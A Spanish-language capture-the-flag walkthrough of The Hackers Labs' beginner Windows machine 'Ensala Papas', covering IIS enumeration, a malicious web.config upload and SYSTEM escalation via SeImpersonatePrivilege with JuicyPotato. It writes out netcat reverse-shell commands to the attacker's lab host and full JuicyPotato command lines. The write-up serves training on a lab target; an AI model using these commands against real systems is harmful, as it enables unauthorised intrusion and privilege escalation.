THL Ensala Papas — Windows
Esta es una máquina de The Hackers Labs de nivel Principiante
Para poder hacer uso de esta máquina primero debemos descargar el archivo y así poder desplegar el laboratorio.
Descargamos el archivo de la página https://thehackerslabs.com/
Al momento de descargar esta máquina y descomprimir el archivo, en este caso observamos un archivo.
Para desplegar el laboratorio usaremos nuestro hipervisor favorito y podemos observar que se trata de un Windows.
Ya que no sabemos la dirección IP lo que realizaremos es un escaneo de la red con arp-scan, al enviar el comando podemos observar que tenemos varias direcciones.
Realizamos un ping a las direcciones para detectar cuál es la Windows y podemos observar que la dirección 192.168.0.14 es la máquina objetivo debido al ttl.
Realizamos un escaneo de puertos y podemos observar varios puertos habilitados.
Al ingresar la dirección IP en el navegador observamos la siguiente página.
Realizamos un listado de métodos que podemos emplear, pero no tenemos nada que nos sirva.
Usamos davtest ya que intenta subir varios archivos para identificar un objetivo posible, pero tampoco identifica alguno.
Como es un servicio IIS realizaremos una búsqueda personalizada de archivos asp y aspx. Por ello ejecutamos gobuster donde podemos ver que identifico solo un archivo.
Agregamos el archivo en la dirección IP y observamos que se trata de una página donde podemos subir archivos.
Inspeccionamos la página y podemos observar que está comentado un subdirectorio.
Nos dirigimos al directorio donde se puede ver un archivo web.config.
Tratamos de abrir el archivo, pero no es posible.
Probamos subiendo un archivo, para ver si se suben a ese directorio, pero no es posible.
Buscando en la página de HackTricks observamos que hablan del archivo web.config y tenemos una idea de como aprovecharlo.
Descargamos el archivo del repositorio que nos indica, si lo subimos podemos observar que sube con éxito.
Actualizamos la página del directorio Subiditosdetono, pero nos aparece error.
Si agregamos el nombre del archivo web.config podemos observar que ya tenemos acceso.
Realizamos un whoami /priv y podemos ver que tenemos el SeImpersonatePrivilege.
Ya que tenemos ese privilegio habilitado lo que haremos es copiar JuicyPotato y nc en nuestra carpeta actual.
Luego de ello iniciaremos un servicio con samba donde compartiremos esa carpeta.
Creamos un directorio tmp
Luego de crearlo copiamos ambos archivos en ese directorio.
copy \\192.168.0.5\share\nc.exe C:\tmp\nc.exe
copy \\192.168.0.5\share\JuicyPotato.exe C:\tmp\JuicyPotato.exe
Listamos el directorio y observamos que están allí nuestros archivos.
Iniciamos nuestro listener
Tratamos de establecer conexión de manera directa para obtener los más altos privilegios y ejecutamos el siguiente comando. Pero no es posible establecerla.
JuicyPotato.exe -l 6666 -t * -p C:\Windows\System32\cmd.exe -a "/c C:\tmp\nc.exe -e cmd.exe 192.168.0.5 1234"
Por ello primero establecemos conexión con el usuario, para poder observar que error nos está dando.
c:\tmp\nc.exe -e cmd 192.168.0.5 1234
Volvemos a intentar ejecutando el comando y observamos que no teníamos conexión por el siguiente error.
JuicyPotato.exe -l 6666 -t * -p C:\Windows\System32\cmd.exe -a "/c C:\tmp\nc.exe -e cmd.exe 192.168.0.5 1234"
Revisando el error, podemos observar que se trata de un CLSID.
Miramos la versión del sistema para buscar un CLSID para esa versión.
Probamos agregando uno de manera manual de la siguiente lista que es para la versión encontrada.
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Agregamos el CLSID a nuestro comando.
JuicyPotato.exe -l 6666 -t * -p C:\Windows\System32\cmd.exe -a "/c C:\tmp\nc.exe -e cmd.exe 192.168.0.5 1235" -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
Ejecutamos y podemos observar que no tuvimos problemas.
Realizamos un whoami podemos observar que ya obtuvimos acceso como nt authority\system. De esta manera culminando esta máquina.
